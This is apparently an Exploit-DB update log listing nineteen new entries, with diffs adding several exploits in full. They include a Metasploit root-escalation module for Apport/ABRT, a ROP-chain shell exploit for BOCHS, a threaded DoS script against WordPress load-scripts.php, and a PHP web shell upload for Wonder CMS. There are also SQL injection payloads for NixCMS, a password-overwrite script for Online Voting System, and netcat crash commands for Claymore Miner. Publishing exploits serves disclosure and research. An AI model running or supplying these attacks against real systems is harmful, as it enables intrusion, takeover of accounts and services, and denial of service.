DB: 2018-02-06

19 changes to exploits/shellcodes

WordPress Core -  'load-scripts.php' Denial of Service
Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)
Claymore Dual GPU Miner 10.5 - Format String
Apport/ABRT - 'chroot' Local Privilege Escalation (Metasploit)
MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation
BOCHS 2.6-5 - Buffer Overflow

Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)
Wonder CMS 2.3.1 - Unrestricted File Upload
Wonder CMS 2.3.1 - 'Host' Header Injection
Matrimonial Website Script 2.1.6 - 'uid' SQL Injection
NixCMS 1.0 - 'category_id' SQL Injection
Online Voting System - Authentication Bypass
Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection
Joomla! Component Zh YandexMap 6.2.1.0 - 'id' SQL Injection
Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection
Joomla! Component jLike 1.0 - Information Leak
Joomla! Component JSP Tickets 1.1 - SQL Injection
Student Profile Management System Script 2.0.6 - Authentication Bypass
Netis WF2419 Router - Cross-Site Scripting

Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)

exploits/hardware/webapps/43981.txt

@@ -0,0 +1,44 @@
+# Exploit Title: Netis-WF2419 HTML Injection
+# Date: 20/01/2018
+# Exploit Author: Sajibe Kanti
+# Author Contact :https://twitter.com/@sajibekantibd
+# Vendor Homepage: http://www.netis-systems.com/
+# Version: Netis-WF2419 , V3.2.41381
+# Tested on: Windows 10
+
+# CEV : CVE-2018-6190
+
+
+ HTML Injection in Netis-WF2419
+
+
+
+Netis-WF2419 is prone to an HTML-injection vulnerability because it fails
+to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or script code could run in the context of the
+affected site, potentially allowing the attacker to steal cookie-based
+authentication credentials and control how the site is rendered to the
+user; other attacks are also possible.
+
+Netis-WF2419 is vulnerable;
+
+Proof of Concept:
+
+1. Go to your wireless router ip (ex. 192.168.0.1)
+
+2. Go to Wireless Settings - tab
+
+3. Now Click MAC Filtering -tab
+
+4.Write  MAC Address and in -Description- write (<h1>XSS-PWD</h1>)
+
+5.Click Add
+
+6. Now You Can See HTML Injection
+
+
+
+#Solution:
+
+ Upgrade Firmware

exploits/linux/local/43971.rb

@@ -0,0 +1,185 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apport / ABRT chroot Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges on Linux systems by
+        invoking the default coredump handler inside a namespace ("container").
+
+        Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are
+        vulnerable, due to a feature which allows forwarding reports to
+        a container's Apport by changing the root directory before loading
+        the crash report, causing 'usr/share/apport/apport' within the crashed
+        task's directory to be executed.
+
+        Similarly, Fedora is vulnerable when the kernel crash handler is
+        configured to change root directory before executing ABRT, causing
+        'usr/libexec/abrt-hook-ccpp' within the crashed task's directory to be
+        executed.
+
+        In both instances, the crash handler does not drop privileges,
+        resulting in code execution as root.
+
+        This module has been tested successfully on Apport 2.14.1 on
+        Ubuntu 14.04.1 LTS x86 and x86_64 and ABRT on Fedora 19 and 20 x86_64.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Stéphane Graber', # Independent discovery, PoC and patch
+          'Tavis Ormandy', # Independent discovery and C exploit
+          'Ricardo F. Teixeira', # shell exploit
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'DisclosureDate' => 'Mar 31 2015',
+      'Platform'       => [ 'linux' ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Targets'        => [[ 'Auto', {} ]],
+      'References'     =>
+        [
+          [ 'CVE', '2015-1318' ],
+          [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ],
+          # Exploits
+          [ 'EDB', '36782' ],
+          [ 'EDB', '36746' ],
+          [ 'URL', 'https://gist.github.com/taviso/0f02c255c13c5c113406' ],
+          # ABRT (Fedora)
+          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ],
+          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ],
+          # Apport (Ubuntu)
+          [ 'URL', 'https://usn.ubuntu.com/usn/USN-2569-1/' ],
+          [ 'URL', 'https://code.launchpad.net/~stgraber/apport/pidns-support/+merge/200893' ],
+          [ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758' ],
+          [ 'URL', 'http://bazaar.launchpad.net/~apport-hackers/apport/trunk/revision/2943' ]
+        ]
+    ))
+    register_options(
+      [
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+      ])
+  end
+
+  def base_dir
+    datastore['WritableDir']
+  end
+
+  def check
+    kernel_version = Gem::Version.new cmd_exec('uname -r').split('-').first
+
+    if kernel_version < Gem::Version.new('3.12')
+      vprint_error "Linux kernel version #{kernel_version} is NOT vulnerable"
+      return CheckCode::Safe
+    end
+
+    vprint_good "Linux kernel version #{kernel_version} is vulnerable"
+
+    kernel_core_pattern = cmd_exec 'cat /proc/sys/kernel/core_pattern'
+
+    # Vulnerable core_pattern (abrt):
+    #   kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e
+    # Patched systems no longer preface the command with /usr/sbin/chroot
+    #   kernel.core_pattern = |/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e
+    if kernel_core_pattern.include?('chroot') && kernel_core_pattern.include?('abrt-hook-ccpp')
+      vprint_good 'System is configured to chroot ABRT for crash reporting'
+      return CheckCode::Vulnerable
+    end
+
+    # Vulnerable core_pattern (apport):
+    #   kernel.core_pattern = |/usr/share/apport/apport %p %s %c %P
+    if kernel_core_pattern.include? 'apport'
+      vprint_good 'System is configured to use Apport for crash reporting'
+
+      res = cmd_exec 'apport-cli --version'
+
+      if res.blank?
+        vprint_error 'Apport is NOT installed'
+        return CheckCode::Safe
+      end
+
+      apport_version = Gem::Version.new(res.split('-').first)
+
+      if apport_version >= Gem::Version.new('2.13') && apport_version < Gem::Version.new('2.17.1')
+        vprint_good "Apport version #{apport_version} is vulnerable"
+        return CheckCode::Vulnerable
+      end
+
+      vprint_error "Apport version #{apport_version} is NOT vulnerable"
+
+      return CheckCode::Safe
+    end
+
+    vprint_error 'System is NOT configured to use Apport or chroot ABRT for crash reporting'
+
+    CheckCode::Safe
+  end
+
+  def upload_and_chmodx(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    cmd_exec "chmod +x '#{path}'"
+    register_file_for_cleanup path
+  end
+
+  def exploit
+    if check != CheckCode::Vulnerable
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    # Upload Tavis Ormandy's newpid exploit:
+    # - https://www.exploit-db.com/exploits/36746/
+    # Cross-compiled with:
+    # - i486-linux-musl-cc -static newpid.c
+    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-1318', 'newpid'
+    fd = ::File.open path, 'rb'
+    executable_data = fd.read fd.stat.size
+    fd.close
+
+    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
+    executable_path = "#{base_dir}/#{executable_name}"
+    upload_and_chmodx executable_path, executable_data
+
+    # Upload payload executable
+    payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
+    payload_path = "#{base_dir}/#{payload_name}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    # newpid writes an 'exploit' directory
+    # which must be removed manually if exploitation fails
+    register_dir_for_cleanup "#{base_dir}/exploit"
+
+    # Change working directory to base_dir,
+    # allowing newpid to create the required hard links
+    cmd_exec "cd '#{base_dir}'"
+
+    print_status 'Launching exploit...'
+    output = cmd_exec executable_path
+    output.each_line { |line| vprint_status line.chomp }
+
+    # Check for root privileges
+    id = cmd_exec 'id'
+
+    unless id.include? 'root'
+      fail_with Failure::Unknown, 'Failed to gain root privileges'
+    end
+
+    print_good 'Upgraded session to root privileges'
+    vprint_line id
+
+    # Execute payload executable
+    vprint_status 'Executing payload...'
+    cmd_exec payload_path
+  end
+end

exploits/linux/local/43979.py

@@ -0,0 +1,116 @@
+# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
+# Vulnerability found using Exploit Pack v10 - Fuzzer module
+#
+# An attacker could exploit this vulnerability to execute arbitrary code in the
+# context of the application. Failed exploit attempts will result in a
+# denial-of-service condition.
+#
+# Program description:
+# Bochs is a highly portable free IA-32 (x86) PC emulator written in C++, that
+# runs on most popular platforms. It includes emulation of the Intel x86 CPU,
+# common I/O devices, and a custom BIOS.
+#
+# Homepage: http://bochs.sourceforge.net/
+# Version: 2.6-5
+# Debian package: pool/main/b/bochs/bochs_2.6-5_i386.deb
+
+import os, subprocess
+from struct import pack
+
+# gdb-peda$ run `python -c 'print "A"*1200+"DCBA"'`
+#
+# Program received signal SIGSEGV, Segmentation fault.
+#
+# [----------------------------------registers-----------------------------------]
+# EAX: 0x1
+# EBX: 0x41414141 ('AAAA')
+# ECX: 0x8167fa0
+(<_ZN13bx_real_sim_c16set_quit_contextEPA1_13__jmp_buf_tag>: mov
+edx,DWORD PTR [esp+0x8])
+# EDX: 0x99db660 --> 0x81f2fb4 --> 0x8167f90
+(<_ZN13bx_real_sim_cD2Ev>: repz ret)
+# ESI: 0x41414141 ('AAAA')
+# EDI: 0x41414141 ('AAAA')
+# EBP: 0x41414141 ('AAAA')
+# ESP: 0xbfffedc0 --> 0xb7089300 --> 0xb7032827 ("ISO-10646/UCS2/")
+# EIP: 0x41424344 ('DCBA')
+# EFLAGS: 0x210286 (carry PARITY adjust zero SIGN trap INTERRUPT
+direction overflow)
+# [-------------------------------------code-------------------------------------]
+# Invalid $PC address: 0x41424344
+# [------------------------------------stack-------------------------------------]
+# 0000| 0xbfffedc0 --> 0xb7089300 --> 0xb7032827 ("ISO-10646/UCS2/")
+# 0004| 0xbfffedc4 --> 0xbfffede0 --> 0x2
+# 0008| 0xbfffedc8 --> 0x0
+# 0012| 0xbfffedcc --> 0xb6eee286 (<__libc_start_main+246>: add    esp,0x10)
+# 0016| 0xbfffedd0 --> 0x2
+# 0020| 0xbfffedd4 --> 0xb7089000 --> 0x1b2db0
+# 0024| 0xbfffedd8 --> 0x0
+# 0028| 0xbfffeddc --> 0xb6eee286 (<__libc_start_main+246>: add    esp,0x10)
+# [------------------------------------------------------------------------------]
+# Legend: code, data, rodata, value
+# Stopped reason: SIGSEGV
+# 0x41424344 in ?? ()
+
+# Padding goes here
+junk = 'A'*1200
+ropchain = pack('<I', 0x08095473) # pop esi ; ret
+ropchain += pack('<I', 0x08276420) # @ .data
+ropchain += pack('<I', 0x080945aa) # pop eax ; ret
+ropchain += '/bin'
+ropchain += pack('<I', 0x081701a7) # mov dword ptr [esi], eax ; pop
+ebx ; pop esi ; pop edi ; pop ebp ; ret
+ropchain += pack('<I', 0x41414141) # padding
+ropchain += pack('<I', 0x41414141) # padding
+ropchain += pack('<I', 0x41414141) # padding
+ropchain += pack('<I', 0x41414141) # padding
+ropchain += pack('<I', 0x08095473) # pop esi ; ret
+ropchain += pack('<I', 0x08276424) # @ .data + 4
+ropchain += pack('<I', 0x080945aa) # pop eax ; ret
+ropchain += '//sh'
+ropchain += pack('<I', 0x081701a7) # mov dword ptr [esi], eax ; pop
+ebx ; pop esi ; pop edi ; pop ebp ; ret
+ropchain += pack('<I', 0x41414141) # padding
+ropchain += pack('<I', 0x41414141) # padding
+ropchain += pack('<I', 0x41414141) # padding
+ropchain += pack('<I', 0x41414141) # padding
+ropchain += pack('<I', 0x08095473) # pop esi ; ret
+ropchain += pack('<I', 0x08276428) # @ .data + 8
+ropchain += pack('<I', 0x08099780) # xor eax, eax ; ret
+ropchain += pack('<I', 0x081701a7) # mov dword ptr [esi], eax ; pop
+ebx ; pop esi ; pop edi ; pop ebp ; ret
+ropchain += pack('<I', 0x41414141) # padding
+ropchain += pack('<I', 0x41414141) # padding
+ropchain += pack('<I', 0x41414141) # padding
+ropchain += pack('<I', 0x41414141) # padding
+ropchain += pack('<I', 0x08054cc4) # pop ebx ; ret
+ropchain += pack('<I', 0x08276420) # @ .data
+ropchain += pack('<I', 0x08235733) # pop ecx ; ret
+ropchain += pack('<I', 0x08276428) # @ .data + 8
+ropchain += pack('<I', 0x082350b5) # pop edx ; ret
+ropchain += pack('<I', 0x08276428) # @ .data + 8
+ropchain += pack('<I', 0x08099780) # xor eax, eax ; ret
+ropchain += pack('<I', 0x0804d559) # inc eax ; ret
+ropchain += pack('<I', 0x0804d559) # inc eax ; ret
+ropchain += pack('<I', 0x0804d559) # inc eax ; ret
+ropchain += pack('<I', 0x0804d559) # inc eax ; ret
+ropchain += pack('<I', 0x0804d559) # inc eax ; ret
+ropchain += pack('<I', 0x0804d559) # inc eax ; ret
+ropchain += pack('<I', 0x0804d559) # inc eax ; ret
+ropchain += pack('<I', 0x0804d559) # inc eax ; ret
+ropchain += pack('<I', 0x0804d559) # inc eax ; ret
+ropchain += pack('<I', 0x0804d559) # inc eax ; ret
+ropchain += pack('<I', 0x0804d559) # inc eax ; ret
+ropchain += pack('<I', 0x0804f101) # int 0x80
+crafted_buff = junk + ropchain
+
+try:
+   print("[*] BOCHS 2.6-5 Buffer Overflow - Exploit by Juan Sacco")
+   print("[*] Running, wait for the shell")
+   subprocess.call(["bochs-bin", crafted_buff])
+except OSError as e:
+   if e.errno == os.errno.ENOENT:
+       print "[*] Sorry! BOCHS not found!"
+   else:
+    print "[*] Error executing exploit"
+   raise

exploits/multiple/dos/43972.txt

@@ -0,0 +1,22 @@
+Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing a denial of service.
+
+After reading about the recent vulnerabilities with previous versions, I thought I should take another look at the json listener on port 3333 and see if there was any avenues of attack.
+
+echo -e '{"id":1,"jsonrpc":"1.0","method":"test"}' | nc 192.168.1.107 3333 & printf "\n"
+
+After realizing the buffer was printed I decided to try a few others…
+
+Sending %s does return some strings, however I couldn’t get the hex addresses padded properly to dig in more as I kept getting unable to parse json errors. Sending %p also did yield some results but I’m sure someone more qualified may be able to exploit the stack further…
+
+Finally, sending %n completely kills the mining process.
+
+echo -e '{"id":1,"jsonrpc":"1.0","method":"%n"}' | nc 192.168.1.139 3333 & printf "\n"
+
+Keep your rigs up to date, or stop opening port 3333 to the public. Seriously.
+
+Timeline
+01/26/18 — Reported
+
+01/26/18 —Confirmed and immediately patched. 10.6 released request for 3–4 day embargo
+
+01/31/18 — Public Disclosure

exploits/php/dos/43968.py

@@ -0,0 +1,147 @@
+# EDB Note: python doser.py -g 'http://localhost/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9' -t 9999
+
+
+import requests
+import sys
+import threading
+import random
+import re
+import argparse
+
+host=''
+headers_useragents=[]
+request_counter=0
+printedMsgs = []
+
+def printMsg(msg):
+	if msg not in printedMsgs:
+		print "\n"+msg + " after %i requests" % request_counter
+	printedMsgs.append(msg)
+
+def useragent_list():
+	global headers_useragents
+	headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
+	headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
+	headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
+	headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
+	headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
+	headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
+	headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
+	headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
+	headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
+	headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
+	headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
+	headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
+	return(headers_useragents)
+	
+def randomString(size):
+	out_str = ''
+	for i in range(0, size):
+		a = random.randint(65, 90)
+		out_str += chr(a)
+	return(out_str)
+
+def initHeaders():
+	useragent_list()
+	global headers_useragents, additionalHeaders
+	headers = {
+				'User-Agent': random.choice(headers_useragents),
+				'Cache-Control': 'no-cache',
+				'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
+				'Referer': "http://www.google.com/?q=" + randomString(random.randint(5,10)),
+				'Keep-Alive': random.randint(110,120),
+				'Connection': 'keep-alive'
+				}
+
+	if additionalHeaders:
+		for header in additionalHeaders:
+			headers.update({header.split(":")[0]:header.split(":")[1]})
+	return headers
+
+def handleStatusCodes(status_code):
+	global request_counter
+	sys.stdout.write("\rNumber of requests sent %i" % request_counter)
+	sys.stdout.flush()
+	if status_code == 429:
+			printMsg("You have been throttled")
+	if status_code == 500:
+		printedMsg("Status code 500 received")
+
+def sendGET(url):
+	global request_counter
+	headers = initHeaders()
+	try:
+		request_counter+=1
+		request = requests.get(url, headers=headers)
+		handleStatusCodes(request.status_code)
+
+	except e:
+		pass
+
+def sendPOST(url, payload):
+	global request_counter
+	headers = initHeaders()
+	try:
+		request_counter+=1
+		if payload:
+			request = requests.post(url, data=payload, headers=headers)
+		else:
+			request = requests.post(url, headers=headers)
+		handleStatusCodes(request.status_code)
+		
+	except e:
+		pass
+
+class SendGETThread(threading.Thread):
+	def run(self):
+		try:
+			while True:
+				global url
+				sendGET(url)
+		except:
+			pass
+
+class SendPOSTThread(threading.Thread):
+	def run(self):
+		try:
+			while True:
+				global url, payload
+				sendPOST(url, payload)
+		except:
+			pass
+
+
+# TODO:
+# check if the site stop responding and alert
+
+def main(argv):
+	parser = argparse.ArgumentParser(description='Sending unlimited amount of requests in order to perform DoS attacks. Written by Barak Tawily')
+	parser.add_argument('-g', help='Specify GET request. Usage: -g \'<url>\'')
+	parser.add_argument('-p', help='Specify POST request. Usage: -p \'<url>\'')
+	parser.add_argument('-d', help='Specify data payload for POST request', default=None)
+	parser.add_argument('-ah', help='Specify addtional header/s. Usage: -ah \'Content-type: application/json\' \'User-Agent: Doser\'', default=None, nargs='*')
+	parser.add_argument('-t', help='Specify number of threads to be used', default=500, type=int)
+	args = parser.parse_args()
+
+	global url, payload, additionalHeaders
+	additionalHeaders = args.ah
+	payload = args.d
+
+	if args.g:
+		url = args.g
+		for i in range(args.t):
+			t = SendGETThread()
+			t.start()
+
+	if args.p:
+		url = args.p
+		for i in range(args.t):
+			t = SendPOSTThread()
+			t.start()
+	
+	if len(sys.argv)==1:
+		parser.print_help()
+		exit()
+	
+if __name__ == "__main__":
+   main(sys.argv[1:])

exploits/php/webapps/43963.txt

@@ -0,0 +1,37 @@
+Affected Code:
+
+public static function _uploadFile() { +
+- if ( ! wCMS::$loggedIn && ! isset($_FILES['uploadFile']) && ! isset($_REQUEST['token'])) return; + private static function uploadFileAction()
+- if (isset($_REQUEST['token']) && $_REQUEST['token'] == wCMS::_generateToken() && isset($_FILES['uploadFile'])) {
+
+
+Proof of Concept
+Steps to Reproduce:
+ 
+1. Login with a valid credentials
+2. Select Files option from the Settings menu of Content
+3. Upload a file with php extension containing the below code:
+ 
+           <?php
+ 
+ $cmd=$_GET['cmd'];
+ 
+ system($cmd);
+ 
+ ?>
+ 
+4. Click on Upload
+5. Once the file is uploaded Click on the uploaded file and add ?cmd= to
+the URL followed by a system command such as whoami,time,date etc.
+Example:
+http://localhost:8081/wondercms/files/shell.php?cmd=dir
+
+Recommended Patch:
+
+Create a whitelist of allowed filetypes.
+
+The patch that addresses this bug is available here:
+
+https://github.com/robiso/WonderCMS-testRepo/commit/8bd6cf9f3bf6a1d0123eb8b646584a63ee323c8a?diff=split
+
+At line 742

exploits/php/webapps/43964.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Wonder CMS 2.3.1 Host Header Injection
+# Date: 30-01-2018
+# Exploit Author: Samrat Das
+# Contact: http://twitter.com/Samrat_Das93
+# Website: https://securitywarrior9.blogspot.in/
+# Vendor Homepage: https://www.wondercms.com/
+# Version: 2.3.1
+# CVE : CVE-2017-14523
+# Category: Webapp CMS
+
+1. Description
+
+The application allows illegitimate host header manipulation and leads to aribtary web page re-direction. This can also lead to severe attacks such as password reset or web cache poisoning
+
+ 
+   
+2. Proof of Concept
+
+Intercept any web request of cms using a proxy tool. 
+Change the http host header to: 
+POST / HTTP/1.1
+Host: google.com
+
+You can observe the page being re-directed and the Location header changed in response to: http://www.google.com/ 
+   
+3. Solution:
+   
+To Mitigate host header injections allows only a whitelist of allowed hostnames.

exploits/php/webapps/43965.txt

@@ -0,0 +1,17 @@
+# Exploit Title: Matrimonial Website Script 2.1.6 - 'uid' SQL Injection
+# Dork: N/A
+# Date: 2018-02-03
+# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
+# Vendor Homepage:
+https://www.phpscriptsmall.com/product/matrimonial-website-script/
+# Version: 2.1.6
+# Category: Webapps
+# CVE: N/A
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands.
+# # # # #
+# Proof of Concept:
+
+ 
+ http://localhost/entrepreneur/view-profile.php?uid=[SQL]

exploits/php/webapps/43966.txt

@@ -0,0 +1,42 @@
+# #
+# Exploit Title: NixCMS 1.0 - 'category_id' SQL Ýnjection
+# Dork: N/A
+# Date: 03.02.2018
+# Vendor: https://www.nixdesign.de
+# Software Link: https://www.nixdesign.de/nix-cms/
+# Demo: http://www.jamaram.de/
+# Version: 1.0
+# Tested on: WiN10_X64
+# Exploit Author: Bora Bozdogan
+# Author WebSite : http://borabozdogan.net.tr
+# Author E-mail : borayazilim45@mit.tc
+# Author Skype : borayazilim45
+# # 
+# POC:
+# 
+# http://localhost/[PATH]/single.php?category_id=[SQL]
+# 
+# Parameter: category_id (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: category_id=24' AND 1662=1662 AND 'ZFBe'='ZFBe
+#
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: category_id=24' AND (SELECT 3422 FROM(SELECT COUNT(*),CONCAT(0x71706a7171,(SELECT (ELT(3422=3422,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CjtO'='CjtO
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+#
+# Payload: category_id=24' AND SLEEP(5) AND 'kjea'='kjea
+#
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 15 columns
+# Payload: category_id=24' UNION ALL SELECT NULL,CONCAT(0x71706a7171,0x6953455a5149636b5844654f6f6d4e74506c6b73465572725544644e584158745065566267437574,0x717a627071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- wFQF
+#
+# #
+
+available databases [3]:
+[*] information_schema
+[*] usr_web24_1
+[*] web24_4

exploits/php/webapps/43967.py

@@ -0,0 +1,70 @@
+# Exploit Title: Online Voting System - Authentication Bypass
+# Date: 02.02.2018
+# Vendor Homepage: http://themashabrand.com
+# Software Link: http://themashabrand.com/p/votin
+# Demo: http://localhost/Onlinevoting
+# Version: 1.0
+# Category: Webapps
+# Exploit Author: Giulio Comi
+# CVE : CVE-2018-6180
+
+
+#Description
+
+A flaw in the profile section of Online Voting System allows an unauthenticated user to set an arbitrary password for accounts registered in the application.
+
+The application does not check the validity of the session cookie and updates the password and other fields of a user based on an incremental identifier and without requiring the current valid password for target account.
+
+# Proof of Concept:
+
+#!/usr/bin/env python
+import requests
+from time import sleep
+from lxml import html
+
+
+def own(auth_bypass_request):
+    """
+    Reset the password of a user just knowing his id
+    """
+    url_edit_password = "admin/profile.php"
+
+    payload = {
+               'id': 1,
+               'admin': 'admin',  # overwrite the username of the victim
+               'password': "ARBITRARY_PASSWORD", # overwrite the password of the victim
+               'edit': ''
+              }
+
+    response = auth_bypass_request.post(target_site + url_edit_password, data=payload)
+
+    # Parse response to check if the request was successful
+    check_result = html.fromstring(response).xpath('//div[@class="alert alert-success"]//p//strong/text()')
+
+    return(lambda: False, lambda: True)[str(check_result).find('Successfully') > -1]()
+
+
+def login(login_request):
+    """
+    Enjoy the new password chosen for the victim
+    """
+    credentials = {'username': 'admin',
+                   'password': "ARBITRARY_PASSWORD",
+                   'usertype': 'admin',
+                   'login': ''
+                  }
+
+    response = login_request.post(target_site, data=credentials)
+
+    print(response.text)
+
+
+if __name__ == "__main__":
+
+    target_site = "http://localhost/Onlinevoting/"
+    request = requests.Session()
+    if own(request):
+        sleep(4)  # just a bit of delay
+        login(request)
+    else:
+        print('Maybe the given id is not registered in the application')

exploits/php/webapps/43974.txt

@@ -0,0 +1,61 @@
+<!--
+# # # # #
+# Exploit Title: Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection
+# Dork: N/A
+# Date: 04.02.2018
+# Vendor Homepage: http://zhuk.cc/
+# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/zh-baidumap/
+# Software Download: http://zhuk.cc/files/pkg_zhbaidumap-j30-3.0.0.1-final.zip
+# Version: 3.0.0.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6605
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# Want To Donate ?
+# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
+# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# # # # #
+-->
